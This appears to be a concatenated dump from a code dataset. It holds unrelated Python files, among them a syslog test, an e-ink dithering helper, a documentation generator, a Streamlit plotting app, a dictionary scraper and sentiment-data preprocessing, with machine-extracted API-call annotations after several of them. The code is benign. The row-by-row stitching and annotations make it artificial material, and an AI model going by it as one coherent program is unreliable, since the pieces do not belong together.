    elif(opcao == 0):
        break
    else:
        print("Invalid value entered! ") | [
"funcionario.Funcionario",
"os.system",
"retangulo.Retangulo"
] | [((27, 45), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (36, 45), False, 'import os\n'), ((1566, 1583), 'retangulo.Retangulo', 'Retangulo', (['A1', 'L1'], {}), '(A1, L1)\n', (1575, 1583), False, 'from retangulo import Retangulo\n'), ((2177, 2212), 'funcionario.Funcionario', 'Funcionario', (['nome', 'salario', 'imposto'], {}), '(nome, salario, imposto)\n', (2188, 2212), False, 'from funcionario import Funcionario\n')] |
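
The menu above imports two local modules (retangulo, funcionario) that are not included in this row. Judging only from the call sites, such as Retangulo(A1, L1) and its Area/Perimetro/Diagonal methods, a compatible Retangulo could look like the sketch below. This is an assumption, not the original file.

import math

class Retangulo:
    def __init__(self, altura, largura):
        self.altura = altura
        self.largura = largura

    def Area(self, altura, largura):
        return altura * largura

    def Perimetro(self, altura, largura):
        return 2 * (altura + largura)

    def Diagonal(self, altura, largura):
        return math.sqrt(altura ** 2 + largura ** 2)
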
# -*- coding: utf-8 -*-
import time
import logging
from logging.handlers import SysLogHandler
from hamcrest import *
from amplify.agent.pipelines.syslog import SyslogTail, SYSLOG_ADDRESSES, AmplifyAddresssAlreadyInUse
from test.base import BaseTestCase, disabled_test
__author__ = "<NAME>"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
class SyslogTailTestCase(BaseTestCase):
def setup_method(self, method):
super(SyslogTailTestCase, self).setup_method(method)
self.tail = SyslogTail(address=('localhost', 514), interval=0.1)
# Set up python logger
self.logger = logging.getLogger(self.__class__.__name__)
self.logger.setLevel(logging.DEBUG)
self.handler = SysLogHandler(address=('localhost', 514))
self.handler.setFormatter(logging.Formatter(' amplify: %(message)s'))
self.logger.addHandler(self.handler)
def teardown_method(self, method):
# Revert logger stuff
self.handler.close()
self.handler = None
self.logger = None
# Kill the SyslogTail
self.tail.stop()
self.tail = None
def test_overall(self):
time.sleep(0.1) # Release GIL so async listener can "hear" the DGRAMs
count = 1
while count <= 5:
self.logger.debug('This is message #%s' % count)
count += 1
time.sleep(0.1) # Release GIL so async listener can handle DGRAMs
# Check to see that SyslogListener read 5 messages
assert_that(self.tail.cache, has_length(count-1))
# Check the cache directly to make sure messages were decoded.
for i in range(5):
assert_that(self.tail.cache[i], equal_to(u'This is message #%s\x00' % (i+1)))
# Go through and check the messages via iteration
count = 1
for line in self.tail:
assert_that(line, equal_to(u'This is message #%s\x00' % count))
count += 1
# Check that cache was cleared after iteration
assert_that(self.tail.cache, has_length(0))
# TODO: test_overall doesn't work if there are other tests run with it...why?
# The tests below pass, but will cause test_overall to fail if run...so skipped for now.
@disabled_test
def test_addresses(self):
assert_that(('localhost', 514), is_in(SYSLOG_ADDRESSES))
@disabled_test
def test_socket_conflict(self):
assert_that(
calling(SyslogTail).with_args(address=('localhost', 514)),
raises(AmplifyAddresssAlreadyInUse)
)
| [
"time.sleep",
"logging.Formatter",
"amplify.agent.pipelines.syslog.SyslogTail",
"logging.handlers.SysLogHandler",
"logging.getLogger"
] | [((583, 635), 'amplify.agent.pipelines.syslog.SyslogTail', 'SyslogTail', ([], {'address': "('localhost', 514)", 'interval': '(0.1)'}), "(address=('localhost', 514), interval=0.1)\n", (593, 635), False, 'from amplify.agent.pipelines.syslog import SyslogTail, SYSLOG_ADDRESSES, AmplifyAddresssAlreadyInUse\n'), ((690, 732), 'logging.getLogger', 'logging.getLogger', (['self.__class__.__name__'], {}), '(self.__class__.__name__)\n', (707, 732), False, 'import logging\n'), ((800, 841), 'logging.handlers.SysLogHandler', 'SysLogHandler', ([], {'address': "('localhost', 514)"}), "(address=('localhost', 514))\n", (813, 841), False, 'from logging.handlers import SysLogHandler\n'), ((1237, 1252), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (1247, 1252), False, 'import time\n'), ((1445, 1460), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (1455, 1460), False, 'import time\n'), ((876, 918), 'logging.Formatter', 'logging.Formatter', (['""" amplify: %(message)s"""'], {}), "(' amplify: %(message)s')\n", (893, 918), False, 'import logging\n')] |
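
Outside the test harness above, the intended consumption pattern for SyslogTail appears to be: create it on a syslog address, iterate it to drain the decoded lines, and stop it when finished. A brief sketch; handle_line() is a placeholder, not part of the module.

tail = SyslogTail(address=('localhost', 514), interval=0.1)
try:
    for line in tail:       # iterating also clears the tail's internal cache
        handle_line(line)   # placeholder for real processing
finally:
    tail.stop()
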
import datetime
from enum import Enum
import hitherdither
from PIL import Image
from inky.inky_uc8159 import Inky
WIDTH, HEIGHT = 600, 448
SATURATION = 1.0
start_log = datetime.datetime.now()
last_log = start_log
def log(msg: str) -> None:
global last_log
now = datetime.datetime.now()
diff = (now - last_log).total_seconds()
from_start = (now - start_log).total_seconds()
last_log = now
print(f"[{from_start:5.2f} +{diff:.2f} ]\t{msg}")
class DitheringModes(Enum):
DEFAULT = "default"
SMALL_DOTS = "small_dots"
LARGE_DOTS = "large_dots"
def dithered(
inky: Inky, image: Image, mode: DitheringModes = DitheringModes.DEFAULT
) -> Image:
log("Dithering")
palette = hitherdither.palette.Palette(
inky._palette_blend(SATURATION, dtype="uint24")
)
    thresholds = [64, 64, 64]  # per-channel thresholds passed to hitherdither's ordered dithering
if mode == DitheringModes.SMALL_DOTS:
image_dithered = hitherdither.ordered.cluster.cluster_dot_dithering(
image, palette, thresholds, order=4
)
elif mode == DitheringModes.LARGE_DOTS:
image_dithered = hitherdither.ordered.cluster.cluster_dot_dithering(
image, palette, thresholds, order=8
)
else:
image_dithered = hitherdither.ordered.bayer.bayer_dithering(
image, palette, thresholds, order=8
)
log("Done dithering")
return image_dithered
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
| [
"hitherdither.ordered.bayer.bayer_dithering",
"datetime.datetime.now",
"hitherdither.ordered.cluster.cluster_dot_dithering"
] | [((171, 194), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (192, 194), False, 'import datetime\n'), ((275, 298), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (296, 298), False, 'import datetime\n'), ((953, 1044), 'hitherdither.ordered.cluster.cluster_dot_dithering', 'hitherdither.ordered.cluster.cluster_dot_dithering', (['image', 'palette', 'thresholds'], {'order': '(4)'}), '(image, palette,\n thresholds, order=4)\n', (1003, 1044), False, 'import hitherdither\n'), ((1132, 1223), 'hitherdither.ordered.cluster.cluster_dot_dithering', 'hitherdither.ordered.cluster.cluster_dot_dithering', (['image', 'palette', 'thresholds'], {'order': '(8)'}), '(image, palette,\n thresholds, order=8)\n', (1182, 1223), False, 'import hitherdither\n'), ((1277, 1356), 'hitherdither.ordered.bayer.bayer_dithering', 'hitherdither.ordered.bayer.bayer_dithering', (['image', 'palette', 'thresholds'], {'order': '(8)'}), '(image, palette, thresholds, order=8)\n', (1319, 1356), False, 'import hitherdither\n')] |
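
The chunks() helper above is a plain generator; a quick example of what it yields, using arbitrary example values:

pixels = [1, 2, 3, 4, 5]
list(chunks(pixels, 2))   # -> [[1, 2], [3, 4], [5]]
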
#!/usr/bin/env python2.7
import json
from pprint import pprint
import os
import sys
import re
import dokumentor
import subprocess
def parseParam(arg, indent=0, isReturn=False):
out = ""
if isReturn:
out += "Returns (%s): %s\n" % (parseParamsType(arg["typed"]), arg["description"])
else:
out += "%s* `%s` (%s): %s\n" % (' ' * indent, arg["name"], parseParamsType(arg["typed"]), arg["description"])
if "params" in arg:
# Callback function
for subArg in arg["params"]:
out += parseParam(subArg, indent + 4)
elif type(arg["typed"][0]) is dict:
# Object
for subArg in arg["typed"][0]["details"]:
out += parseParam(subArg, 0 if isReturn else indent + 4)
elif type(arg["typed"][0]) is list:
# Array of Object
for subArg in arg["typed"][0][0]["details"]:
out += parseParam(subArg, 0 if isReturn else indent + 4)
return out
def parseParamsType(types):
out = ""
comma = ""
for t in types:
out += comma
if type(t) is list:
out += "Object[]"
elif type(t) is dict:
out += "Object"
else:
if t[0] == "[":
out += t[1:-1].capitalize() + "[]"
else:
if t == "null":
out += t
else:
out += t if t[0].isupper() else t.capitalize()
comma = " | "
return out
def parseMethod(method, isEvent=False):
out = ""
if isEvent:
out += "\n## Event: %s\n" % (re.sub("[A-Za-z_0-9]+\.", "", method["name"]))
else:
fnArgs = ""
if len(method["params"]) > 0:
comma = ""
for arg in method["params"]:
name = comma + arg["name"]
if arg["default"] != "None":
name += "=%s" % arg["default"]
if arg["is_optional"]:
name = "[%s]" % name
fnArgs += name
comma = ", "
out += "\n## %s%s%s(%s)\n" % ("`static `" if method["is_static"] else "",
"new " if method["is_constructor"] else "",
method["name"],
fnArgs)
if method["is_slow"]:
out += "<!-- YAML\n- Slow method\n-->\n"
out += method["description"] + "\n"
if len(method["params"]) > 0:
out += "\nParams:\n"
for arg in method["params"]:
out += parseParam(arg)
if method["returns"] and not method["is_constructor"]:
if method["returns"]["nullable"]:
method["returns"]["typed"].append("null")
tmp = parseParam(method["returns"], isReturn=True)
if tmp:
out += "\n" + tmp
out += parseSeeAlso(method["sees"])
return out
def parseProperty(prop):
out = ""
out += "\n## %s%s%s%s (%s)\n" % ("`static` " if prop["is_static"] else "",
"`readonly` " if prop["is_readonly"] else "",
prop["name"],
"=" + prop["default"] if prop["default"] != "None" else "",
parseParamsType(prop["typed"]))
out += prop["description"] + "\n"
out += parseExample(prop["examples"])
out += parseSeeAlso(prop["sees"])
return out
def parseSeeAlso(seeAlso):
return ""
"""
out = ""
if len(seeAlso) > 0:
out += "\nSee also:\n"
for see in seeAlso:
out += "* `%s`\n" % (see["data"])
return out
"""
def parseExample(examples):
out = ""
if len(examples) > 0:
out += "\n"
for ex in examples:
out += "\n```%s\n%s\n```\n" % (ex["language"], ex["data"])
return out
def parse(klass, data):
out = ""
out += "# Class: %s" % (klass) + "\n"
item = data["base"][klass]
out += item["description"]
out += parseExample(item["examples"])
out += parseSeeAlso(item["sees"])
if data["constructors"]:
out += parseMethod(data["constructors"][klass])
if data["methods"]:
for name, method in data["methods"].iteritems():
out += parseMethod(method)
if data["static_methods"]:
for name, method in data["static_methods"].iteritems():
out += parseMethod(method)
if data["properties"]:
for name, prop in data["properties"].iteritems():
out += parseProperty(prop)
if data["events"]:
for evName, ev in data["events"].iteritems():
out += parseMethod(ev, isEvent=True)
return out
print("Running dokumentor")
class captureDokumentor:
def __init__(self):
self.data = ""
def write(self, msg):
self.data += msg
def flush(self=None):
pass
sys.stdout = captureDokumentor()
dokumentor.process("../docs/")
docs = sys.modules['DOCC'].DOC
dokumentor.report("json", docs)
data = json.loads(sys.stdout.data)
sys.stdout = sys.__stdout__
hierarchy = {}
for section, items in data["_sections"].iteritems():
if section not in data:
data[section] = {"base": { section: {"description": "", "sees":[], "examples": {}}}, "constructors": {}, "methods": [], "properties": [], "events":[], "static_methods": []}
hierarchy[section] = {"data": parse(section, data[section])}
hierarchy[section]["children"] = {}
for klass in items:
hierarchy[section]["children"][klass] = parse(klass, data[klass])
path = "../docs/en/api/"
try:
os.mkdir(path)
except:
pass
for directory in hierarchy:
if len(hierarchy[directory]["children"]) > 1:
subPath = path + directory + "/"
try:
os.mkdir(subPath)
except:
pass
print("Writing %s" % subPath + directory + ".md")
with open(subPath + directory + ".md", "w") as f:
f.write(hierarchy[directory]["data"])
for child in hierarchy[directory]["children"]:
print(" - Writing %s" % subPath + child + ".md")
with open(subPath + child + ".md", "w") as f:
f.write(hierarchy[directory]["children"][child])
else:
print("Writing %s" % path + directory + ".md")
with open(path + directory + ".md", "w") as f:
f.write(hierarchy[directory]["data"])
| [
"os.mkdir",
"json.loads",
"dokumentor.process",
"dokumentor.report",
"re.sub"
] | [((4870, 4900), 'dokumentor.process', 'dokumentor.process', (['"""../docs/"""'], {}), "('../docs/')\n", (4888, 4900), False, 'import dokumentor\n'), ((4932, 4963), 'dokumentor.report', 'dokumentor.report', (['"""json"""', 'docs'], {}), "('json', docs)\n", (4949, 4963), False, 'import dokumentor\n'), ((4971, 4998), 'json.loads', 'json.loads', (['sys.stdout.data'], {}), '(sys.stdout.data)\n', (4981, 4998), False, 'import json\n'), ((5543, 5557), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (5551, 5557), False, 'import os\n'), ((1568, 1614), 're.sub', 're.sub', (['"""[A-Za-z_0-9]+\\\\."""', '""""""', "method['name']"], {}), "('[A-Za-z_0-9]+\\\\.', '', method['name'])\n", (1574, 1614), False, 'import re\n'), ((5720, 5737), 'os.mkdir', 'os.mkdir', (['subPath'], {}), '(subPath)\n', (5728, 5737), False, 'import os\n')] |
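
Two quick examples of what the type formatter above produces, traced from the branches of parseParamsType (expected outputs shown as comments):

parseParamsType(["string", "[int]", "null"])   # -> "String | Int[] | null"
parseParamsType([{"details": []}, ["..."]])    # -> "Object | Object[]"
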
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import plotly.express as px
import plotly.graph_objects as go
import streamlit as st
import io
import base64
from util import process_file
def limit_x_values(data, x_column, settings):
st.markdown("### Limit x Range")
x_min = st.number_input("Choose minimum x:", value=min([min(df[x_column].values) for df in data]))
x_max = st.number_input("Choose maximum x:", value=max([max(df[x_column].values) for df in data]))
settings['x_min'] = x_min
settings['x_max'] = x_max
data_out = []
for df in data:
mask = (df[x_column].values > x_min) * (df[x_column].values < x_max)
data_out.append(df[mask])
return data_out, settings
scales = {'A': 1, 'mA': 1e3, 'µA': 1e6}
def scale_current(data, y_column, settings):
st.markdown("### Scale Current")
scale = st.selectbox("Scale:", list(scales.keys()), index=1)
settings['y_scale'] = scale
data_out = []
for df in data:
df2 = df.copy()
df2[y_column] = df2[y_column] * scales[scale]
data_out.append(df2)
return data_out, settings
# def process_data(data, y_column, settings):
# st.markdown("### Rescale y-axis")
# st.selectbox("Choose y-axis scale:", value=[0, 3, 6, 9], format_func=
def run():
df = None
cols = None
x_column = y_column = None
combined_data = None
processing="None"
if 'ever_submitted' not in st.session_state:
st.session_state.ever_submitted = False
settings = {"processing": "None"}
st.markdown("""## Combine CSV Electrochemistry files
This helper will combine multiple CSV files (or Excel spreadsheets)
for easy plotting.
""")
files = st.file_uploader("Upload CSV or Excel Files",
accept_multiple_files=True)
if files:
st.write(files)
filenames = [(i, f.name) for i, f in enumerate(files)]
data = [process_file(f) for f in files]
ind_fname = st.selectbox("Choose data to display: ", filenames,
format_func=lambda x: x[1], index=0)
st.write("""## Labels
Use the boxes below to change the labels for each line that will go on the graph.
""")
labels = [st.text_input(f"{filename[0]}. {filename[1]}", value=filename[1]) for filename in filenames]
if ind_fname:
df = data[ind_fname[0]]
cols = list(df.columns)
st.write("## Choose columns")
with st.form("column_chooser_and_run"):
x_column = st.selectbox("Choose the x column: ", cols)
y_column = st.selectbox("Choose y column: ", cols, index=len(cols)-1)
submitted = st.form_submit_button()
st.session_state.ever_submitted = submitted | st.session_state.ever_submitted
use_plotly = st.checkbox("Use plotly?", value=False)
if data is not None:
data, settings = limit_x_values(data, x_column, settings)
data, settings = scale_current(data, y_column, settings)
# data, settings = normalize_data(data, x_column, settings)
# x_data = combined_data[x_column].values
# Plotting
if use_plotly:
fig = go.Figure()
else:
fig, ax = plt.subplots()
for df, fname, label in zip(data, filenames, labels):
if use_plotly:
fig.add_trace(go.Line(x=df[x_column], y=df[y_column], name=str(fname[0])+"-"+label))
else:
ax.plot(df[x_column].values, df[y_column].values, label=str(fname[0])+"-"+label)
y_label_default = f"{y_column} ({settings['y_scale']})"
st.markdown("### Plotting options")
x_label = st.text_input("x-axis label: ", value=x_column)
y_label = st.text_input('y-axis label: ', value=y_label_default)
grid = st.checkbox("Grid?", value=False)
if grid and not use_plotly:
ax.grid()
if use_plotly:
fig.update_layout(xaxis_title=x_label, yaxis_title=y_label)
st.plotly_chart(fig)
else:
ax.set_xlabel(x_label)
ax.set_ylabel(y_label)
ax.legend()
st.pyplot(fig)
# # Saving
# st.markdown("### Output options")
# st.write(combined_data)
# filename = st.text_input("Filename:", value="data")
# write_excel(combined_data, filename)
if __name__ == "__main__":
run()
| [
"streamlit.form",
"streamlit.markdown",
"streamlit.text_input",
"streamlit.plotly_chart",
"streamlit.checkbox",
"plotly.graph_objects.Figure",
"streamlit.write",
"streamlit.file_uploader",
"util.process_file",
"streamlit.form_submit_button",
"streamlit.pyplot",
"streamlit.selectbox",
"matplotlib.pyplot.subplots"
] | [((263, 295), 'streamlit.markdown', 'st.markdown', (['"""### Limit x Range"""'], {}), "('### Limit x Range')\n", (274, 295), True, 'import streamlit as st\n'), ((832, 864), 'streamlit.markdown', 'st.markdown', (['"""### Scale Current"""'], {}), "('### Scale Current')\n", (843, 864), True, 'import streamlit as st\n'), ((1561, 1721), 'streamlit.markdown', 'st.markdown', (['"""## Combine CSV Electrochemistry files\n\nThis helper will combine multiple CSV files (or Excel spreadsheets)\nfor easy plotting.\n\n """'], {}), '(\n """## Combine CSV Electrochemistry files\n\nThis helper will combine multiple CSV files (or Excel spreadsheets)\nfor easy plotting.\n\n """\n )\n', (1572, 1721), True, 'import streamlit as st\n'), ((1725, 1798), 'streamlit.file_uploader', 'st.file_uploader', (['"""Upload CSV or Excel Files"""'], {'accept_multiple_files': '(True)'}), "('Upload CSV or Excel Files', accept_multiple_files=True)\n", (1741, 1798), True, 'import streamlit as st\n'), ((1839, 1854), 'streamlit.write', 'st.write', (['files'], {}), '(files)\n', (1847, 1854), True, 'import streamlit as st\n'), ((1988, 2081), 'streamlit.selectbox', 'st.selectbox', (['"""Choose data to display: """', 'filenames'], {'format_func': '(lambda x: x[1])', 'index': '(0)'}), "('Choose data to display: ', filenames, format_func=lambda x: x\n [1], index=0)\n", (2000, 2081), True, 'import streamlit as st\n'), ((2098, 2224), 'streamlit.write', 'st.write', (['"""## Labels\nUse the boxes below to change the labels for each line that will go on the graph.\n """'], {}), '(\n """## Labels\nUse the boxes below to change the labels for each line that will go on the graph.\n """\n )\n', (2106, 2224), True, 'import streamlit as st\n'), ((2443, 2472), 'streamlit.write', 'st.write', (['"""## Choose columns"""'], {}), "('## Choose columns')\n", (2451, 2472), True, 'import streamlit as st\n'), ((2837, 2876), 'streamlit.checkbox', 'st.checkbox', (['"""Use plotly?"""'], {'value': '(False)'}), "('Use plotly?', value=False)\n", (2848, 2876), True, 'import streamlit as st\n'), ((1935, 1950), 'util.process_file', 'process_file', (['f'], {}), '(f)\n', (1947, 1950), False, 'from util import process_file\n'), ((2233, 2298), 'streamlit.text_input', 'st.text_input', (['f"""{filename[0]}. {filename[1]}"""'], {'value': 'filename[1]'}), "(f'{filename[0]}. 
{filename[1]}', value=filename[1])\n", (2246, 2298), True, 'import streamlit as st\n'), ((2486, 2519), 'streamlit.form', 'st.form', (['"""column_chooser_and_run"""'], {}), "('column_chooser_and_run')\n", (2493, 2519), True, 'import streamlit as st\n'), ((2544, 2587), 'streamlit.selectbox', 'st.selectbox', (['"""Choose the x column: """', 'cols'], {}), "('Choose the x column: ', cols)\n", (2556, 2587), True, 'import streamlit as st\n'), ((2695, 2718), 'streamlit.form_submit_button', 'st.form_submit_button', ([], {}), '()\n', (2716, 2718), True, 'import streamlit as st\n'), ((3738, 3773), 'streamlit.markdown', 'st.markdown', (['"""### Plotting options"""'], {}), "('### Plotting options')\n", (3749, 3773), True, 'import streamlit as st\n'), ((3800, 3847), 'streamlit.text_input', 'st.text_input', (['"""x-axis label: """'], {'value': 'x_column'}), "('x-axis label: ', value=x_column)\n", (3813, 3847), True, 'import streamlit as st\n'), ((3870, 3924), 'streamlit.text_input', 'st.text_input', (['"""y-axis label: """'], {'value': 'y_label_default'}), "('y-axis label: ', value=y_label_default)\n", (3883, 3924), True, 'import streamlit as st\n'), ((3944, 3977), 'streamlit.checkbox', 'st.checkbox', (['"""Grid?"""'], {'value': '(False)'}), "('Grid?', value=False)\n", (3955, 3977), True, 'import streamlit as st\n'), ((3246, 3257), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (3255, 3257), True, 'import plotly.graph_objects as go\n'), ((3302, 3316), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3314, 3316), True, 'import matplotlib.pyplot as plt\n'), ((4165, 4185), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig'], {}), '(fig)\n', (4180, 4185), True, 'import streamlit as st\n'), ((4326, 4340), 'streamlit.pyplot', 'st.pyplot', (['fig'], {}), '(fig)\n', (4335, 4340), True, 'import streamlit as st\n')] |
#!/usr/bin/env python3
from sys import stderr, exit
import sys
import graph_connectivity_lib as gcl
def startAlgo():
numNodes = None
spoon = input().strip()
# Getting graph
while spoon[:len("graph:")] != "graph:":
# Getting number of nodes
if spoon[:len("# number of nodes:")] == "# number of nodes:":
numNodes = spoon.split(':')[1]
numNodes = int("".join(numNodes.split()))
# Getting number archs
if spoon[:len("# number of arcs: ")] == "# number of arcs: ":
m = spoon.split(':')[1]
m = int("".join(m.split()))
spoon = input().strip()
# Creating graph
grafo = gcl.Graph(numNodes)
# Getting arcs
for _ in range(m):
spoon = input().strip()
v, u = spoon.split(' ')
v, u = int(v), int(u)
grafo.add_edge(v, u)
    # Receive instructions from the service
while spoon[:len("# Tell me")] != "# Tell me":
spoon = input().strip()
# Checking spanning tree
input_spTree, not_visited = grafo.spanning_tree()
# Telling sp tree length
print(len(input_spTree))
#printing sp tree
for i in range(len(input_spTree)):
u, v = input_spTree[i]
print(f"{u} {v}")
# Getting response
spoon = input().strip()
while spoon != "#end".strip():
print(spoon)
sys.stderr.write(str(spoon)+ "\n")
spoon = input().strip()
# Main
spoon = input().strip()
while spoon[:len("#start")] != "#start":
spoon = input().strip()
# Reading the graph
startAlgo() | [
"graph_connectivity_lib.Graph"
] | [((684, 703), 'graph_connectivity_lib.Graph', 'gcl.Graph', (['numNodes'], {}), '(numNodes)\n', (693, 703), True, 'import graph_connectivity_lib as gcl\n')] |
#import Pillow
#from colors.py import generate_colors
import colorthief
from colorthief import ColorThief
import glob
from pathlib import Path
def get_colors(image):
dominant_color = ColorThief(image).get_palette(color_count=3, quality=3)
return dominant_color
#print (get_colors('blockchains/polygon/info/logo.png'))
def get_files():
files = list(Path('blockchains').glob('**/*.png'))
return files
#print (get_files())
def main():
colors_list = []
for i in get_files():
color = get_colors(i)
name = str(i).split('/')[-2]
if name == 'info':
name = str(i).split('/')[-3]
tmp = {name: color}
print(tmp)
colors_list.append(tmp)
print(colors_list)
main()
| [
"pathlib.Path",
"colorthief.ColorThief"
] | [((186, 203), 'colorthief.ColorThief', 'ColorThief', (['image'], {}), '(image)\n', (196, 203), False, 'from colorthief import ColorThief\n'), ((355, 374), 'pathlib.Path', 'Path', (['"""blockchains"""'], {}), "('blockchains')\n", (359, 374), False, 'from pathlib import Path\n')] |
import pandas as pd
from crawler import MyDict
class MyEnglishDict(MyDict):
def __init__(self, url):
super(MyEnglishDict, self).__init__(url)
def lookup(self, word):
output = {}
raw_text = self.get_web_result(self.url, word)
phonetic_symbols = raw_text.find(name='ul', class_='Mean_symbols__5dQX7')
if phonetic_symbols is None:
return None
phonetic_symbols = phonetic_symbols.find_all('li')
if len(phonetic_symbols) < 2:
return None
phonetic_symbols_text = [x for x in phonetic_symbols[1].strings]
output['phonetic_symbol'] = phonetic_symbols_text[1]
print(output['phonetic_symbol'])
meanings = raw_text.find(name='ul', class_='Mean_part__1RA2V').find_all('li')
if meanings is None:
return None
definitions = []
for m in meanings:
lexical_category = m.find('i').string
raw_definitions = m.find_all('span')
sub_definitions = [lexical_category]
for d in raw_definitions:
sub_definitions.append(d.text)
definitions.append(' '.join(sub_definitions))
output['definitions'] = '\n'.join(definitions)
print(output['definitions'])
return output
if __name__ == '__main__':
df = pd.DataFrame(columns=["Word", "Audio", "Meaning", "Example", "Source"])
dictionary = MyEnglishDict("http://www.iciba.com/word?w=")
while True:
print("//--------------------------------------")
        unknown_word = input("Enter the word to look up (or type '886' to quit): ")
        if unknown_word == '886':
            empty = input("This will overwrite the previously saved results; press Enter to continue...")
            df.to_csv('./save_recode_english.csv', index=False, header=False, encoding='utf-8_sig')
            break
        result = dictionary.lookup(unknown_word)
        if result is None:
            print("Word not found TAT")
            continue
        sentence = input("Enter an example sentence (or 'N' to skip saving): ")
        if sentence != 'N':
            source = input("Enter the source of the example sentence (optional): ")
df = df.append([{'Word': unknown_word, "Audio": result['phonetic_symbol'], "Meaning": result['definitions'], "Example": sentence, "Source": source}], ignore_index=True)
| [
"pandas.DataFrame"
] | [((1370, 1441), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['Word', 'Audio', 'Meaning', 'Example', 'Source']"}), "(columns=['Word', 'Audio', 'Meaning', 'Example', 'Source'])\n", (1382, 1441), True, 'import pandas as pd\n')] |
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid.axislines import SubplotZero
import numpy as np
import cyllene.f_functionclass as f_funct
import sympy as sp
'''
A number of problems still need to be resolved:
1) Can we keep a record of the graphs drawn so far? This could be done by simply keeping the numpy arrays.
2) We need to be able to deal with poles of functions (for example 1/x at x = 0, or 1/(x^2 - 1) at x = -1 and x = 1).
'''
class graph():
def __init__(self):
self.fig = plt.figure(1)
self.ax = SubplotZero(self.fig,111)
self.fig.add_subplot(self.ax)
for direction in ["xzero","yzero"]:
self.ax.axis[direction].set_axisline_style("-|>")
self.ax.axis[direction].set_visible(True)
for direction in ["left","right","bottom","top"]:
self.ax.axis[direction].set_visible(False)
def make_graph(self, f):
I = f.behaviour("largest interval")
ps = float(I.args[0])
pe = float(I.args[1])
t = np.arange(ps, pe, 0.01)
self.ax.plot(t, f.eval_np(t))
def make_graphs(self, *functions,Interval=None):
if(Interval == None):
f = functions[0]
I = f.behaviour("largest interval")
l,r = float(I.args[0]), float(I.args[1])
for f in functions:
I = f.behaviour("largest interval")
l,r = min(l,float(I.args[0])), max(r,float(I.args[1]))
else:
l,r = float(Interval.args[0]), float(Interval.args[1])
self.Interval = sp.Interval(l,r)
t = np.arange(l,r,.01)
for f in functions:
self.ax.plot(t,f.eval_np(t))
def make_secent(self,f,x1,x2):
I = f.behaviour("largest interval")
ps = float(I.args[0])
pe = float(I.args[1])
t = np.arange(ps, pe, 0.01)
sec = f.secent_line(x1,x2)
self.ax.plot(t, sec.eval_np(t))
self.plot_point(x1, sec.eval_np(x1))
self.plot_point(x2,sec.eval_np(x2))
def make_tangent(self,f,x):
I = f.behaviour("largest interval")
ps = float(I.args[0])
pe = float(I.args[1])
t = np.arange(ps, pe, 0.01)
tan = f.tangent_line(x)
self.ax.plot(t, tan.eval_np(t))
self.plot_point(x, tan.eval_np(x))
def plot_point(self, x, y):
self.ax.plot(np.array([x]), np.array([y]), 'ro')
    def zoom(self, f, I):
        # zoom both axes so that f is displayed over the interval I
        self.zoom_x(I)
        self.zoom_y(f.range(I))
def zoom_x(self,I):
ps = float(I.args[0])
pe = float(I.args[1])
self.ax.set_xlim(ps,pe)
def zoom_y(self,I):
ps = float(I.args[0])
pe = float(I.args[1])
self.ax.set_ylim(ps,pe)
def show(self):
return self.fig | [
"mpl_toolkits.axes_grid.axislines.SubplotZero",
"sympy.Interval",
"matplotlib.pyplot.figure",
"numpy.array",
"numpy.arange"
] | [((486, 499), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (496, 499), True, 'import matplotlib.pyplot as plt\n'), ((512, 538), 'mpl_toolkits.axes_grid.axislines.SubplotZero', 'SubplotZero', (['self.fig', '(111)'], {}), '(self.fig, 111)\n', (523, 538), False, 'from mpl_toolkits.axes_grid.axislines import SubplotZero\n'), ((930, 953), 'numpy.arange', 'np.arange', (['ps', 'pe', '(0.01)'], {}), '(ps, pe, 0.01)\n', (939, 953), True, 'import numpy as np\n'), ((1375, 1392), 'sympy.Interval', 'sp.Interval', (['l', 'r'], {}), '(l, r)\n', (1386, 1392), True, 'import sympy as sp\n'), ((1405, 1426), 'numpy.arange', 'np.arange', (['l', 'r', '(0.01)'], {}), '(l, r, 0.01)\n', (1414, 1426), True, 'import numpy as np\n'), ((1607, 1630), 'numpy.arange', 'np.arange', (['ps', 'pe', '(0.01)'], {}), '(ps, pe, 0.01)\n', (1616, 1630), True, 'import numpy as np\n'), ((1896, 1919), 'numpy.arange', 'np.arange', (['ps', 'pe', '(0.01)'], {}), '(ps, pe, 0.01)\n', (1905, 1919), True, 'import numpy as np\n'), ((2065, 2078), 'numpy.array', 'np.array', (['[x]'], {}), '([x])\n', (2073, 2078), True, 'import numpy as np\n'), ((2080, 2093), 'numpy.array', 'np.array', (['[y]'], {}), '([y])\n', (2088, 2093), True, 'import numpy as np\n')] |
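
A hedged usage sketch for the graph helper above. It assumes f is a cyllene function object exposing the interface the class already relies on (eval_np, behaviour("largest interval"), tangent_line, secent_line, range); those names come from the calls in the class and are not verified against f_functionclass.

g = graph()
g.make_graph(f)           # plot f over its largest interval
g.make_tangent(f, 1)      # overlay the tangent line at x = 1
g.make_secent(f, 0, 2)    # overlay the secant line through x = 0 and x = 2
fig = g.show()            # returns the underlying matplotlib Figure
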
import sc_utils
import model_factory
import numpy as np
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
INPUT_LENGTH = 100
# Prepare data
X_train, Y_train, X_test, Y_test = sc_utils.load_data()
X_train, Y_train, X_val, Y_val, X_test, Y_test, tokenizer = sc_utils.preprocess_data(X_train, Y_train, X_test, Y_test, INPUT_LENGTH)
embedding_matrix = sc_utils.create_embedding_matrix(tokenizer)
print("X_train.shape: " + str(X_train.shape))
print("Y_train.shape: " + str(Y_train.shape))
print("X_val.shape: " + str(X_val.shape))
print("Y_val.shape: " + str(Y_val.shape))
